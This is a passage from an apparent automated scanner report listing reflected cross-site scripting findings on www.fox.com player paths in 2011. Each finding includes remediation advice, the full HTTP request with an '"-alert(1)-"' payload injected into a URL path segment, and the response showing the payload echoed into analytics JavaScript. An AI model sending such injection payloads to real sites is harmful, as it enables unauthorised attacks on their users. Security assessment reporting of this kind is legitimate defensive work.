Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uif141d"-alert(1)-"e64e46fa8a2/fox_player/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd"
s_analytics.hier1="fox:shows:_uif141d"-alert(1)-"e64e46fa8a2:fox_playerakamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uif141d"-alert(1)-"e64e46f
...[SNIP]...

1.160. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7276"-alert(1)-"48fb49619f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playere7276"-alert(1)-"48fb49619f8/swf/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21824
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd"
s_analytics.hier1="fox:shows:_ui:fox_playere7276"-alert(1)-"48fb49619f8akamaihd" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere7276"-alert(1)-"48fb496
...[SNIP]...

1.161. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/akamaiHD.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c64f"-alert(1)-"ea254c087f9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf6c64f"-alert(1)-"ea254c087f9/akamaiHD.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21712
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf6c64f"-alert(1)-"ea254c087f9"
s_analytics.prop15="sub section:akamaihd" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

1.162. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3982f"-alert(1)-"621e918d4e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui3982f"-alert(1)-"621e918d4e4/fox_player/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication"
s_analytics.hier1="fox:shows:_ui3982f"-alert(1)-"621e918d4e4:fox_playerauthentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3982f"-alert
...[SNIP]...

1.163. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9977"-alert(1)-"e2c0455eee8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerb9977"-alert(1)-"e2c0455eee8/swf/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication"
s_analytics.hier1="fox:shows:_ui:fox_playerb9977"-alert(1)-"e2c0455eee8authentication" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerb9977"-alert
...[SNIP]...

1.164. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/authentication.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ad"-alert(1)-"78b834686 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfac0ad"-alert(1)-"78b834686/authentication.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 21734
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:14:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfac0ad"-alert(1)-"78b834686"
s_analytics.prop15="sub section:authentication" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytic
...[SNIP]...

1.165. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79185"-alert(1)-"40638905b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui79185"-alert(1)-"40638905b61/fox_player/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21920
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui79185"-alert(1)-"40638905b61:fox_playerfoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox
...[SNIP]...

1.166. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14f20"-alert(1)-"50e3151d1ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player14f20"-alert(1)-"50e3151d1ef/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:48 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui:fox_player14f20"-alert(1)-"50e3151d1effoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:
...[SNIP]...

1.167. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7026e"-alert(1)-"46fe9d5d8f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_ui/fox_player/swf7026e"-alert(1)-"46fe9d5d8f6/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21780
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf7026e"-alert(1)-"46fe9d5d8f6"
s_analytics.prop15="sub section:foxcomscoreresolverplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 =
...[SNIP]...

1.168. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aeff3"-alert(1)-"ddf1ec587d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with quotes, backslashes and control characters backslash-escaped and with < and > encoded as \u003c and \u003e, so that the data can terminate neither the string nor the enclosing script block. Rejecting path segments that contain quotes or angle brackets is a useful additional layer, not a substitute for output encoding.

Request

GET /_uiaeff3"-alert(1)-"ddf1ec587d0/fox_player/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.102
Content-Type: text/html; charset=utf-8
Content-Length: 21896
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uiaeff3"-alert(1)-"ddf1ec587d0:fox_playerfoxurlsigningplugin"
